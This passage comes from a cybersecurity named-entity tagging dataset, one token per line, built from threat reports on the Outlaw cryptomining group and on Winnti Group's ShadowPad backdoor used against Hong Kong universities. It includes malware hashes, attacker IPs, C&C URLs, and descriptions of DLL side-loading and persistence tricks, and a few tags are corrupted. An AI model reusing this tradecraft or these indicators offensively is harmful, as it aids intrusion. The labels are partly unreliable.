+there O
+is O
+a O
+patch O
+released O
+and O
+waiting O
+to O
+be O
+downloaded O
+. O
+
+Save O
+for O
+a O
+few O
+iteration O
+updates O
+, O
+combinations O
+from O
+previous O
+deployments O
+, O
+and O
+using O
+the O
+routines O
+repetitively O
+for O
+every O
+campaign O
+, O
+we O
+found O
+very O
+little O
+changes O
+in O
+the O
+group O
+’s O
+toolkit O
+, O
+which O
+allowed O
+various O
+honeypots S-MAL
+across O
+the O
+Eastern B-LOC
+European E-LOC
+region O
+to O
+detect O
+many O
+of O
+the O
+sent O
+binaries O
+. O
+
+Meanwhile O
+, O
+the O
+group O
+uses O
+a O
+wide O
+range O
+of O
+IP O
+addresses O
+as O
+input O
+for O
+scanning O
+activities O
+that O
+are O
+grouped O
+by O
+country O
+, O
+allowing O
+them O
+to O
+attack O
+certain O
+regions O
+or O
+areas O
+within O
+particular O
+periods O
+of O
+the O
+year O
+, O
+as O
+previously O
+observed O
+. O
+
+We O
+think O
+the O
+group O
+has O
+likely O
+become O
+more O
+enterprising O
+, O
+and O
+learned O
+to O
+take O
+advantage O
+of O
+some O
+details O
+from O
+their O
+previous O
+campaigns O
+to O
+maximize O
+profit O
+opportunities O
+while O
+exerting O
+minimal O
+effort O
+. O
+
+By O
+shaping O
+the O
+attack O
+, O
+the O
+group O
+may O
+be O
+able O
+to O
+create O
+niches O
+in O
+the O
+underground O
+, O
+catering O
+to O
+the O
+specific O
+needs O
+of O
+their O
+customers O
+. O
+
+Also O
+aware O
+of O
+the O
+existing O
+laws O
+in O
+Europe S-LOC
+, O
+they O
+can O
+avoid O
+prosecution O
+in O
+certain O
+countries O
+as O
+long O
+as O
+they O
+avoid O
+attacking O
+them O
+. O
+
+Collection O
+of O
+results O
+and O
+data O
+from O
+scanning O
+in O
+this O
+manner O
+might O
+be O
+easier O
+to O
+sort O
+( O
+while O
+allowing O
+them O
+to O
+stay O
+under O
+the O
+radar O
+) O
+, O
+as O
+compared O
+to O
+getting O
+feedback O
+from O
+zombie O
+bots O
+deployed O
+around O
+the O
+world O
+simultaneously O
+. O
+
+We O
+will O
+continue O
+to O
+monitor O
+this O
+hacking O
+group O
+’s O
+activities O
+and O
+their O
+toolkit O
+’s O
+developments O
+. O
+
+Outlaw S-APT
+’s O
+attack O
+routines O
+may O
+not O
+be O
+new O
+, O
+but O
+it O
+still O
+serves O
+as O
+a O
+reminder O
+for O
+enterprises O
+to O
+update O
+their O
+systems O
+regularly O
+. O
+
+Legacy O
+system O
+users O
+may O
+use O
+their O
+providers O
+’ O
+virtual O
+patches O
+. O
+
+Users O
+are O
+advised O
+to O
+close O
+unused O
+ports O
+, O
+to O
+secure O
+ports O
+and O
+other O
+internet-facing O
+devices O
+that O
+are O
+regularly O
+open O
+for O
+system O
+administrators O
+’ O
+support O
+. O
+
+Users O
+can O
+also O
+adopt O
+a O
+multilayered O
+security O
+solution O
+that O
+can O
+protect O
+systems O
+from O
+the O
+gateway O
+to O
+the O
+endpoint O
+, O
+actively O
+blocking O
+malicious O
+URLs O
+by O
+employing O
+filtering O
+, O
+behavioral O
+analysis O
+, O
+and O
+custom O
+sandboxing O
+. O
+
+Users O
+can O
+consider O
+adopting O
+security O
+solutions O
+that O
+can O
+defend O
+against O
+malicious O
+bot-related O
+activities O
+such O
+as O
+Outlaw S-APT
+’s O
+through O
+a O
+cross-generational O
+blend O
+of O
+threat O
+defense O
+techniques O
+. O
+
+Trend B-TOOL
+Micro™ I-TOOL
+XGen™ E-TOOL
+security O
+provides O
+high-fidelity O
+machine O
+learning O
+that O
+can O
+secure O
+the O
+gateway O
+and O
+endpoints O
+, O
+and O
+protect O
+physical O
+, O
+virtual O
+, O
+and O
+cloud O
+workloads O
+. O
+
+With O
+technologies O
+that O
+employ O
+web/URL O
+filtering O
+, O
+behavioral O
+analysis O
+, O
+and O
+custom O
+sandboxing O
+, O
+XGen S-TOOL
+security O
+offers O
+protection O
+against O
+ever-changing O
+threats O
+that O
+bypass O
+traditional O
+controls O
+and O
+exploit O
+known O
+and O
+unknown O
+vulnerabilities O
+. O
+
+A O
+multi-layered O
+connected O
+network O
+defense O
+and O
+complete O
+visibility O
+into O
+all O
+network O
+traffic O
+, O
+in O
+addition O
+to O
+next-generation B-TOOL
+intrusion I-TOOL
+prevention I-TOOL
+system E-TOOL
+( O
+NGIPS S-TOOL
+) O
+, O
+can O
+help O
+organizations O
+stay O
+a O
+step O
+ahead O
+of O
+threats O
+that O
+could O
+compromise O
+intangible O
+assets O
+. O
+
+XGen S-SECTEAM
+security O
+also O
+powers O
+Trend B-IDTY
+Micro E-IDTY
+’s O
+suite O
+of O
+security O
+solutions O
+: O
+Hybrid O
+Cloud O
+Security O
+and O
+User O
+Protection O
+. O
+
+Outlaw S-APT
+: O
+1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa S-SHA2
+Cryptocurrency B-TOOL
+miner E-TOOL
+Trojan.SH.MALXMR.UWEJP S-MAL
+. O
+
+Outlaw S-APT
+: O
+b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d S-SHA2
+Shellbot S-MAL
+Backdoor.SH.SHELLBOT.AA S-MAL
+. O
+
+Outlaw S-APT
+: O
+620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 S-SHA2
+Tool O
+Trojan.Linux.SSHBRUTE.B S-MAL
+. O
+
+Outlaw S-APT
+: O
+fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a S-SHA2
+Cryptocurrency B-TOOL
+miner E-TOOL
+Coinminer.Linux.MALXMR.SMDSL32 S-MAL
+. O
+
+Outlaw S-APT
+: O
+649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 S-SHA2
+Cryptocurrency B-TOOL
+miner E-TOOL
+Coinminer.Linux.MALXMR.SMDSL64 S-MAL
+. O
+
+Outlaw S-APT
+: O
+159.203.141.208 S-IP
+. O
+
+Outlaw S-APT
+: O
+104.236.192.6 S-IP
+. O
+
+Outlaw S-APT
+: O
+45.9.148.129:80 S-IP
+Miner B-TOOL
+pool E-TOOL
+. O
+
+Outlaw S-APT
+: O
+45.9.148.125:80 S-IP
+Miner B-TOOL
+pool E-TOOL
+. O
+
+Outlaw S-APT
+: O
+http://www.minpop.com/sk12pack/idents.php S-URL
+Command B-TOOL
+and I-TOOL
+control E-TOOL
+. O
+
+Outlaw S-APT
+: O
+http://www.minpop.com/sk12pack/names.php S-URL
+Command B-TOOL
+and I-TOOL
+control E-TOOL
+. O
+
+
+Winnti B-APT
+Group E-APT
+targeting O
+universities O
+in O
+Hong B-LOC
+Kong E-LOC
+. O
+
+In O
+November B-TIME
+2019 E-TIME
+, O
+we O
+discovered O
+a O
+new O
+campaign O
+run O
+by O
+the O
+Winnti B-APT
+Group E-APT
+against O
+two O
+Hong B-LOC
+Kong E-LOC
+universities O
+. O
+
+We O
+found O
+a O
+new O
+variant O
+of O
+the O
+ShadowPad B-MAL
+backdoor E-MAL
+, O
+the O
+group O
+’s O
+flagship O
+backdoor S-MAL
+, O
+deployed O
+using O
+a O
+new O
+launcher O
+and O
+embedding O
+numerous O
+modules O
+. O
+
+The B-MAL
+Winnti I-MAL
+malware E-MAL
+was O
+also O
+found O
+at O
+these O
+universities O
+a O
+few O
+weeks O
+prior O
+to O
+ShadowPad S-MAL
+. O
+
+The O
+Winnti B-APT
+Group E-APT
+, O
+active O
+since O
+at B-TIME
+least I-TIME
+2012 E-TIME
+, O
+is O
+responsible O
+for O
+for O
+high-profile O
+supply-chain O
+attacks O
+against O
+the O
+video O
+game O
+and O
+software O
+industries O
+leading O
+to O
+the O
+distribution O
+of O
+trojanized B-MAL
+software E-MAL
+( O
+such O
+as O
+CCleaner S-TOOL
+, O
+ASUS B-TOOL
+LiveUpdate E-TOOL
+and O
+multiple O
+video O
+games O
+) O
+that O
+is O
+then O
+used O
+to O
+compromise O
+more O
+victims O
+. O
+
+It O
+is O
+also O
+known O
+for O
+having O
+compromised O
+various O
+targets O
+in O
+the O
+healthcare O
+and O
+education O
+sectors O
+. O
+
+ESET S-IDTY
+researchers O
+recently O
+published O
+a O
+white O
+paper O
+updating O
+our O
+understanding O
+of O
+the O
+arsenal O
+of O
+the O
+Winnti B-APT
+Group E-APT
+, O
+following O
+a O
+blog O
+post O
+documenting O
+a O
+supply-chain O
+attack O
+targeting O
+the O
+videogame O
+industry O
+in O
+Asia S-LOC
+. O
+
+Additionally O
+, O
+we O
+published O
+a O
+blog O
+post O
+on O
+a O
+new O
+backdoor S-MAL
+named O
+skip-2.0 S-MAL
+that O
+targets O
+Microsoft B-TOOL
+SQL I-TOOL
+Server E-TOOL
+. O
+
+This O
+article O
+focuses O
+on O
+the O
+technical O
+details O
+of O
+this O
+new O
+ShadowPad S-MAL
+variant O
+. O
+
+About O
+the O
+“ O
+Winnti B-APT
+Group E-APT
+” O
+naming O
+: O
+
+We O
+have O
+chosen O
+to O
+keep O
+the O
+name O
+“ O
+Winnti B-APT
+Group E-APT
+” O
+since O
+it O
+’s O
+the O
+name O
+first O
+used O
+to O
+identify O
+it O
+, O
+in O
+2013 S-TIME
+, O
+by O
+Kaspersky S-SECTEAM
+. O
+
+Since O
+Winnti S-MAL
+is O
+also O
+a O
+malware O
+family O
+, O
+we O
+always O
+write O
+“ O
+Winnti B-APT
+Group E-APT
+” O
+when O
+we O
+refer O
+to O
+the O
+malefactors O
+behind O
+the O
+attacks O
+. O
+
+Since O
+2013 S-TIME
+, O
+it O
+has O
+been O
+demonstrated O
+that O
+Winnti S-MAL
+is O
+only O
+one O
+of O
+the O
+many O
+malware O
+families O
+used O
+by O
+the O
+Winnti B-APT
+Group E-APT
+. O
+
+In O
+November B-TIME
+2019 E-TIME
+, O
+ESET S-IDTY
+’s O
+machine-learning O
+engine O
+, O
+Augur S-TOOL
+, O
+detected O
+a O
+malicious O
+and O
+unique O
+sample O
+present O
+on O
+multiple O
+computers O
+belonging O
+to O
+two O
+Hong B-LOC
+Kong E-LOC
+universities O
+where O
+the O
+Winnti S-MAL
+malware O
+had O
+already O
+been O
+found O
+at O
+the O
+end B-TIME
+of I-TIME
+October E-TIME
+. O
+
+The O
+suspicious O
+sample O
+detected O
+by O
+Augur S-TOOL
+is O
+actually O
+a O
+new O
+32-bit O
+ShadowPad S-MAL
+launcher O
+. O
+
+Samples O
+from O
+both O
+ShadowPad S-MAL
+and O
+Winnti S-MAL
+found O
+at O
+these O
+universities O
+contain O
+campaign O
+identifiers O
+and O
+C&C S-TOOL
+URLs O
+with O
+the O
+names O
+of O
+the O
+universities O
+, O
+which O
+indicates O
+a O
+targeted O
+attack O
+. O
+
+In O
+addition O
+to O
+the O
+two O
+compromised O
+universities O
+, O
+thanks O
+to O
+the O
+C&C S-TOOL
+URL O
+format O
+used O
+by O
+the O
+attackers O
+we O
+have O
+reasons O
+to O
+think O
+that O
+at O
+least O
+three O
+additional O
+Hong B-LOC
+Kong E-LOC
+universities O
+may O
+have O
+been O
+compromised O
+using O
+these O
+same O
+ShadowPad S-MAL
+and O
+Winnti S-MAL
+variants O
+. O
+
+This O
+campaign O
+of O
+the O
+Winnti B-APT
+Group E-APT
+against O
+Hong B-LOC
+Kong E-LOC
+universities O
+was O
+taking O
+place O
+in O
+the O
+context O
+of O
+Hong B-LOC
+Kong E-LOC
+facing O
+civic O
+protests O
+that O
+started O
+in O
+June B-TIME
+2019 E-TIME
+triggered O
+by O
+an O
+extradition O
+bill O
+. O
+
+Even O
+though O
+the O
+bill O
+was O
+withdrawn O
+in O
+October B-TIME
+2019 E-TIME
+, O
+protests O
+continued O
+, O
+demanding O
+full O
+democracy O
+and O
+investigation O
+of O
+the O
+Hong B-LOC
+Kong E-LOC
+police O
+. O
+
+These O
+protests O
+gathered O
+hundreds O
+of O
+thousands O
+of O
+people O
+in O
+the O
+streets O
+with O
+large O
+support O
+from O
+students O
+of O
+Hong B-LOC
+Kong E-LOC
+universities O
+, O
+leading O
+to O
+multiple O
+university O
+campus O
+occupations O
+by O
+the O
+protesters O
+. O
+
+We O
+have O
+contacted O
+the O
+compromised O
+universities O
+and O
+provided O
+the O
+necessary O
+information O
+and O
+assistance O
+to O
+remediate O
+the O
+compromise O
+. O
+
+Unlike O
+previous O
+ShadowPad S-MAL
+variants O
+documented O
+in O
+our O
+white O
+paper O
+on O
+the O
+arsenal O
+of O
+the O
+Winnti B-APT
+Group E-APT
+, O
+this O
+launcher O
+is O
+not O
+obfuscated O
+using O
+VMProtect S-TOOL
+. O
+
+Furthermore O
+, O
+the O
+encrypted O
+payload O
+is O
+neither O
+embedded O
+in O
+the O
+overlay O
+nor O
+located O
+in O
+a O
+COM1:NULL.dat O
+alternate O
+data O
+stream O
+. O
+
+And O
+the O
+usual O
+RC5 S-ENCR
+encryption O
+with O
+a O
+key O
+derived O
+from O
+the O
+volume O
+ID O
+of O
+the O
+system O
+drive O
+of O
+the O
+victim O
+machine O
+( O
+as O
+seen O
+in O
+the O
+PortReuse B-MAL
+backdoor E-MAL
+, O
+skip-2.0 S-MAL
+and O
+some O
+ShadowPad S-MAL
+variants O
+) O
+is O
+not O
+present O
+either O
+. O
+
+In O
+this O
+case O
+, O
+the O
+launcher O
+is O
+much O
+simpler O
+. O
+
+The O
+launcher O
+is O
+a O
+32-bit O
+DLL S-TOOL
+named O
+hpqhvsei.dll S-FILE
+, O
+which O
+is O
+the O
+name O
+of O
+a O
+legitimate O
+DLL S-TOOL
+loaded O
+by O
+hpqhvind.exe S-FILE
+. O
+
+This O
+executable O
+is O
+from O
+HP S-IDTY
+and O
+is O
+usually O
+installed O
+with O
+their O
+printing O
+and O
+scanning O
+software O
+called O
+“ O
+HP B-TOOL
+Digital I-TOOL
+Imaging E-TOOL
+” O
+. O
+
+In O
+this O
+case O
+the O
+legitimate O
+hpqhvind.exe S-FILE
+was O
+dropped O
+by O
+the O
+attackers O
+, O
+along O
+with O
+their O
+malicious O
+hpqhvsei.dll S-FILE
+, O
+in O
+C:\Windows\Temp O
+. O
+
+Although O
+we O
+do O
+not O
+have O
+the O
+component O
+that O
+dropped O
+and O
+executed O
+this O
+launcher O
+, O
+the O
+presence O
+of O
+these O
+files O
+leads O
+us O
+to O
+think O
+that O
+the O
+initial O
+execution O
+of O
+this O
+launcher O
+is O
+done O
+through O
+DLL B-TOOL
+side-l S-TOOLoading E-TOOL
+. O
+
+When O
+the O
+malicious O
+DLL S-TOOL
+is O
+loaded O
+at O
+hpqhvind.exe S-FILE
+startup O
+, O
+its O
+DLLMain O
+function O
+is O
+called O
+that O
+will O
+check O
+its O
+parent O
+process O
+for O
+the O
+following O
+sequence O
+of O
+bytes O
+at O
+offset O
+0x10BA O
+. O
+
+In O
+the O
+case O
+where O
+the O
+parent O
+process O
+is O
+hpqhvind.exe S-FILE
+, O
+this O
+sequence O
+of O
+bytes O
+is O
+present O
+at O
+this O
+exact O
+location O
+and O
+the O
+malicious O
+DLL S-TOOL
+will O
+proceed O
+to O
+patch O
+the O
+parent O
+process O
+in O
+memory O
+. O
+
+It O
+replaces O
+the O
+original O
+instructions O
+at O
+0x10BA O
+with O
+an O
+unconditional O
+jump O
+( O
+jmp O
+– O
+0xE9 O
+) O
+to O
+the O
+address O
+of O
+the O
+function O
+from O
+hpqhvsei.dll S-FILE
+that O
+decrypts O
+and O
+executes O
+the O
+encrypted O
+payload O
+embedded O
+in O
+the O
+launcher O
+. O
+
+The O
+decompiled O
+function O
+responsible O
+for O
+patching O
+the O
+parent O
+process O
+. O
+
+In O
+case O
+hpqhvsei.dll S-FILE
+is O
+loaded O
+by O
+a O
+different O
+process O
+than O
+hpqhvind.exe S-FILE
+, O
+the O
+malicious O
+code O
+will O
+not O
+be O
+decrypted O
+and O
+executed O
+. O
+
+The O
+difference O
+between O
+the O
+original O
+and O
+patched O
+hpqhvind.exe S-FILE
+. O
+
+The O
+part O
+of O
+the O
+code O
+that O
+is O
+patched O
+is O
+located O
+at O
+the O
+very O
+beginning O
+of O
+the O
+main O
+function O
+of O
+hpqhvind.exe S-FILE
+. O
+
+The O
+patched O
+code O
+is O
+located O
+right O
+after O
+the O
+load O
+of O
+hpqhvsei.dll S-FILE
+. O
+
+This O
+means O
+that O
+the O
+function O
+responsible O
+for O
+decrypting O
+and O
+executing O
+the O
+payload O
+is O
+executed O
+directly O
+after O
+the O
+load O
+of O
+the O
+malicious O
+DLL S-TOOL
+. O
+
+The O
+encrypted O
+payload O
+is O
+located O
+in O
+the O
+.rdata O
+section O
+of O
+hpqhvsei.dll S-FILE
+and O
+the O
+decryption O
+algorithm O
+is O
+an O
+XOR S-ENCR
+loop O
+where O
+the O
+XOR S-ENCR
+key O
+is O
+updated O
+at O
+each O
+iteration O
+. O
+
+The O
+decrypted O
+payload O
+is O
+the O
+usual O
+shellcode S-TOOL
+responsible O
+for O
+ShadowPad S-MAL
+initialization O
+( O
+obfuscated O
+using O
+fake O
+conditional O
+jumps O
+to O
+hinder O
+disassembly O
+) O
+. O
+
+After O
+having O
+been O
+decrypted O
+, O
+ShadowPad S-MAL
+’s O
+shellcode S-TOOL
+is O
+executed O
+. O
+
+It O
+will O
+first O
+achieve O
+persistence O
+on O
+the O
+system O
+by O
+writing O
+the O
+in-memory O
+patched O
+parent O
+process O
+to O
+disk O
+to O
+a O
+path O
+specified O
+in O
+the O
+configuration O
+string O
+pool O
+. O
+
+In O
+the O
+case O
+we O
+examined O
+, O
+the O
+path O
+was O
+C:\ProgramData\DRM\CLR\CLR.exe S-FILE
+. O
+
+It O
+then O
+creates O
+a O
+service O
+named O
+clr_optimization_v4.0.30229_32 O
+, O
+which O
+is O
+responsible O
+for O
+executing O
+CLR.exe S-FILE
+. O
+
+To O
+avoid O
+suspicion O
+, O
+this O
+service O
+name O
+, O
+as O
+well O
+as O
+the O
+executable O
+name O
+, O
+were O
+chosen O
+to O
+look O
+similar O
+to O
+the O
+name O
+of O
+a O
+Microsoft B-TOOL
+.NET I-TOOL
+optimiza S-IDTYtion I-TOOL
+Service E-TOOL
+. O
+
+The O
+numbering O
+on O
+each O
+arrow O
+corresponds O
+to O
+the O
+chronological O
+sequence O
+of O
+events O
+. O
+
+ShadowPad S-MAL
+is O
+a O
+multimodular O
+backdoor S-MAL
+where O
+the O
+modules O
+are O
+referenced O
+from O
+the O
+Root O
+module O
+with O
+a O
+circular O
+list O
+from O
+which O
+one O
+can O
+extract O
+the O
+module O
+address O
+, O
+a O
+UNIX S-OS
+timestamp O
+( O
+probably O
+embedded O
+automatically O
+during O
+the O
+module O
+’s O
+compilation O
+process O
+) O
+and O
+a O
+module O
+identifier O
+. O
+
+From O
+the O
+module O
+itself O
+we O
+can O
+also O
+extract O
+the O
+name O
+the O
+developer O
+gave O
+to O
+the O
+module O
+. O
+
+This O
+version O
+embeds O
+the O
+17 O
+modules O
+listed O
+in O
+the O
+following O
+table O
+: O
+
+100 O
+Root O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:08:27 I-TIME
+PM I-TIME
+UTC E-TIME
+Initial O
+shellcode O
+. O
+101 O
+Plugins O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:07:02 I-TIME
+PM I-TIME
+UTC E-TIME
+Provides O
+API O
+for O
+the O
+other O
+modules O
+; O
+loads O
+modules O
+. O
+102 O
+Config O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:07:09 I-TIME
+PM I-TIME
+UTC E-TIME
+Handles B-FILE
+encrypted I-FILE
+configuration I-FILE
+string I-FILE
+pool E-FILE
+. O
+103 O
+Install O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:07:46 I-TIME
+PM I-TIME
+UTC E-TIME
+Achieves O
+persistence O
+. O
+104 O
+Online O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:07:17 I-TIME
+PM I-TIME
+UTC E-TIME
+Overall O
+communications O
+with O
+the O
+C&C S-TOOL
+server O
+. O
+106 O
+ImpUser O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:07:24 I-TIME
+PM I-TIME
+UTC E-TIME
+User O
+impersonation O
+via O
+token O
+duplication O
+. O
+200 O
+TCP S-PROT
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:01:01 I-TIME
+PM I-TIME
+UTC E-TIME
+TCP S-PROT
+communications O
+. O
+202 O
+HTTPS O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:01:15 I-TIME
+PM I-TIME
+UTC E-TIME
+HTTPS S-PROT
+communications O
+. O
+207 O
+Pipe O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:01:35 I-TIME
+PM I-TIME
+UTC E-TIME
+Handles O
+named O
+pipes O
+. O
+300 O
+Disk O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:02:29 I-TIME
+PM I-TIME
+UTC E-TIME
+File O
+system O
+operations O
+. O
+301 O
+Process O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:02:36 I-TIME
+PM I-TIME
+UTC E-TIME
+Process O
+handling O
+. O
+302 O
+Servcie O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:02:45 I-TIME
+PM I-TIME
+UTC E-TIME
+Service O
+handling O
+. O
+303 O
+Register O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:02:52 I-TIME
+PM I-TIME
+UTC E-TIME
+Registry O
+operations O
+. O
+304 O
+Shell O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:03:00 I-TIME
+PM I-TIME
+UTC E-TIME
+Command O
+line O
+operations O
+. O
+306 O
+Keylogger O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:03:16 I-TIME
+PM I-TIME
+UTC E-TIME
+Keylogging O
+to O
+file O
+system O
+. O
+307 O
+Screen O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:03:25 I-TIME
+PM I-TIME
+UTC E-TIME
+Screenshot O
+capture O
+. O
+317 O
+RecentFiles O
+Thu B-TIME
+24 I-TIME
+Oct I-TIME
+2019 I-TIME
+12:04:44 I-TIME
+PM I-TIME
+UTC E-TIME
+Lists O
+recently O
+accessed O
+files O
+. O
+
+These O
+modules O
+, O
+except O
+for O
+RecentFiles O
+, O
+have O
+already O
+been O
+mentioned O
+by O
+Kaspersky S-SECTEAM
+and O
+Avast S-SECTEAM
+. O
+
+Notice O
+the O
+“ O
+Servcie O
+” O
+typo O
+. O
+
+As O
+usual O
+, O
+all O
+the O
+module O
+timestamps O
+are O
+spread O
+over O
+a O
+short O
+time O
+range O
+, O
+which O
+could O
+suggest O
+the O
+use O
+of O
+a O
+build O
+framework O
+to O
+compile O
+these O
+modules O
+. O
+
+This O
+also O
+suggests O
+that O
+these O
+modules O
+were O
+built O
+a O
+few O
+hours O
+before O
+the O
+launcher O
+itself O
+, O
+whose O
+compilation O
+timestamp O
+is O
+Thu B-TIME
+Oct I-TIME
+24 I-TIME
+14:10:32 I-TIME
+2019 E-TIME
+. O
+
+Since O
+this O
+compilation O
+timestamp O
+dates O
+back O
+two O
+weeks O
+before O
+this O
+campaign O
+, O
+it O
+’s O
+likely O
+that O
+it O
+has O
+n’t O
+been O
+tampered O
+with O
+by O
+the O
+attackers O
+. O
+
+One O
+might O
+also O
+note O
+that O
+the O
+number O
+of O
+modules O
+embedded O
+in O
+this O
+variant O
+is O
+much O
+higher O
+( O
+17 O
+) O
+than O
+the O
+number O
+of O
+modules O
+embedded O
+in O
+the O
+variants O
+previously O
+documented O
+in O
+our O
+white O
+paper O
+( O
+8 O
+to O
+10 O
+modules O
+) O
+. O
+
+By O
+default O
+, O
+every O
+keystroke O
+is O
+recorded O
+using O
+the O
+Keylogger O
+module O
+( O
+306, O
+previously O
+documented O
+by O
+Avast S-SECTEAM
+) O
+and O
+saved O
+to O
+disk O
+in O
+the O
+file O
+%APPDATA%\PAGM\OEY\XWWEYG\WAOUE S-FILE
+. O
+
+The O
+log O
+file O
+is O
+encrypted O
+using O
+the O
+same O
+algorithm O
+as O
+the O
+one O
+used O
+to O
+encrypt O
+static O
+strings O
+from O
+the O
+module O
+. O
+
+Using O
+this O
+module O
+by O
+default O
+indicates O
+that O
+the O
+attackers O
+are O
+interested O
+in O
+stealing O
+information O
+from O
+the O
+victims O
+’ O
+machines O
+. O
+
+In O
+contrast O
+, O
+the O
+variants O
+we O
+described O
+in O
+our O
+white O
+paper O
+did O
+n’t O
+even O
+have O
+that O
+module O
+embedded O
+. O
+
+As O
+with O
+previous O
+ShadowPad S-MAL
+variants O
+, O
+the O
+Config O
+module O
+( O
+102 O
+) O
+contains O
+an O
+encrypted O
+string O
+pool O
+that O
+can O
+be O
+accessed O
+from O
+any O
+other O
+module O
+. O
+
+The O
+string O
+pool O
+is O
+never O
+stored O
+entirely O
+decrypted O
+in O
+memory O
+; O
+the O
+field O
+of O
+interest O
+is O
+decrypted O
+when O
+needed O
+and O
+then O
+immediately O
+freed O
+( O
+thus O
+quickly O
+unavailable O
+) O
+. O
+
+The O
+configuration O
+size O
+is O
+2180 O
+bytes O
+and O
+the O
+encrypted O
+strings O
+are O
+located O
+at O
+offset O
+0x84 O
+. O
+
+The O
+algorithm O
+used O
+to O
+decrypt O
+the O
+strings O
+is O
+the O
+same O
+as O
+the O
+one O
+used O
+to O
+decrypt O
+the O
+static O
+strings O
+of O
+the O
+module O
+. O
+
+The O
+campaign O
+ID O
+is O
+located O
+at O
+offset O
+0x99 O
+and O
+is O
+the O
+name O
+of O
+the O
+targeted O
+university O
+. O
+
+Having O
+a O
+campaign O
+ID O
+related O
+to O
+the O
+target O
+is O
+quite O
+common O
+in O
+the O
+case O
+of O
+ShadowPad S-MAL
+and O
+Winnti S-MAL
+. O
+
+Interestingly O
+, O
+the O
+timestamp O
+present O
+in O
+this O
+config O
+at O
+offset O
+0x84 O
+is O
+later O
+than O
+the O
+modules O
+’ O
+timestamps O
+and O
+the O
+loader O
+compilation O
+timestamp O
+. O
+
+This O
+suggests O
+that O
+this O
+config O
+is O
+added O
+manually O
+to O
+the O
+sample O
+after O
+having O
+been O
+built O
+. O
+
+Even O
+though O
+it O
+’s O
+probably O
+coincidental O
+, O
+the O
+date O
+within O
+the O
+config O
+corresponds O
+to O
+the O
+date O
+of O
+the O
+first O
+detection O
+of O
+this O
+sample O
+at O
+the O
+corresponding O
+university O
+. O
+
+Once O
+installed O
+on O
+the O
+system O
+, O
+ShadowPad S-MAL
+starts O
+a O
+hidden O
+and O
+suspended O
+Microsoft B-TOOL
+Windows I-TOOL
+Media I-TOOL
+Player E-TOOL
+wmplayer.exe S-FILE
+process O
+and O
+injects O
+itself O
+into O
+that O
+process O
+. O
+
+The O
+path O
+to O
+wmplayer.exe S-FILE
+is O
+provided O
+by O
+the O
+Config O
+module O
+. O
+
+Once O
+ShadowPad S-MAL
+is O
+injected O
+into O
+wmplayer.exe S-FILE
+, O
+the O
+Online O
+module O
+will O
+contact O
+the O
+C&C S-TOOL
+server O
+using O
+the O
+URL O
+specified O
+in O
+the O
+configuration O
+. O
+
+The O
+communication O
+is O
+then O
+handled O
+by O
+the O
+TCP S-PROT
+module O
+( O
+200 O
+) O
+, O
+which O
+was O
+previously O
+documented O
+by O
+Kaspersky S-SECTEAM
+. O
+
+In O
+addition O
+to O
+ShadowPad S-MAL
+, O
+the O
+Winnti S-MAL
+malware O
+was O
+found O
+on O
+some O
+machines O
+at O
+these O
+two O
+universities O
+at O
+the O
+end B-TIME
+of I-TIME
+October E-TIME
+( O
+i.e O
+. O
+two O
+weeks O
+before O
+ShadowPad S-MAL
+) O
+in O
+the O
+file O
+C:\Windows\System32\oci.dll S-FILE
+and O
+is O
+detected O
+by O
+ESET S-IDTY
+products O
+as O
+Win64/Winnti.CA O
+. O
+
+The O
+Winnti S-MAL
+malware O
+usually O
+contains O
+a O
+configuration O
+specifying O
+a O
+campaign O
+ID O
+and O
+a O
+C&C S-TOOL
+URL O
+. O
+
+On O
+all O
+machines O
+the O
+campaign O
+ID O
+matches O
+the O
+name O
+of O
+the O
+targeted O
+university O
+and O
+the O
+C&C S-TOOL
+URLs O
+are O
+: O
+
+w[redacted].livehost.live S-URL
+: O
+443 O
+. O
+w[redacted].dnslookup.services S-URL
+: O
+443 O
+. O
+where O
+the O
+redacted O
+part O
+corresponds O
+to O
+the O
+name O
+of O
+the O
+targeted O
+university O
+. O
+
+One O
+can O
+observe O
+that O
+the O
+C&C S-TOOL
+URL O
+used O
+by O
+both O
+Winnti S-MAL
+and O
+ShadowPad S-MAL
+complies O
+to O
+the O
+scheme O
+[backdoor_type][target_name].domain.tld O
+: O
+443 O
+where O
+[backdoor_type] O
+is O
+a O
+single O
+letter O
+which O
+is O
+either O
+“ O
+w O
+” O
+in O
+the O
+case O
+of O
+the O
+Winnti S-MAL
+malware O
+or O
+“ O
+b O
+” O
+in O
+the O
+case O
+of O
+ShadowPad S-MAL
+. O
+
+From O
+this O
+format O
+, O
+we O
+were O
+able O
+to O
+find O
+several O
+C&C S-URL
+URLs O
+, O
+including O
+three O
+additional O
+Hong B-LOC
+Kong E-LOC
+universities O
+’ O
+names O
+. O
+
+The O
+campaign O
+identifiers O
+found O
+in O
+the O
+samples O
+we O
+’ve O
+analyzed O
+match O
+the O
+subdomain O
+part O
+of O
+the O
+C&C S-TOOL
+server O
+, O
+showing O
+that O
+these O
+samples O
+were O
+really O
+targeted O
+against O
+these O
+universities O
+. O
+
